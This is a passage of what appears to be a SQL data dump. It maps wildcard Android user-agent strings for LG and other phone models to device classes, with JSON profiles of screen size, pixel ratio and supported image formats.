Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-F800K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-F800L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-F800S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-G710) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H830) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H831) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H850) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H860) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H870) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H870AR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H870DS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H870S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H871) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H871S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H872) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H873) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H915) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H918) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H930) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H931) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H932) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H933) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-H990) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-LS993) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-LS997) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-LS998) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-M200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-M250) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-M255) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-M320) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-M320G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-M700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-M703) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-Q710AL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-Q710PL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-US700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-US996) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LG-US998) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LGL423DL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LGM-G600K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LGM-G600S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LGM-X320L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LGM-X600K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LGM-X600L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LGUS997) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LGV35) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LGV36) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LINX ATOM 3G LT4049PG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LINX TRIX 4G LS5041PL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LIVE 7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LIVE 7S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LLD-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LLD-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LLD-AL20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LLD-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LLD-L31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-G710) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-G710VM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-Q610(FGN)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-Q610.FG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-Q610.FGN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-Q710(FGN)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-Q710.FG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-Q710.FGN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-Q850) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-V350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-V405) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X210(G)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X210) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X210APM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X210CM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X212(G)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X220) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X220PM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X410(FG)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X410.F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X410.FG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X410.FGN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X410PM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X410UM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X415K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; LM-X420) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 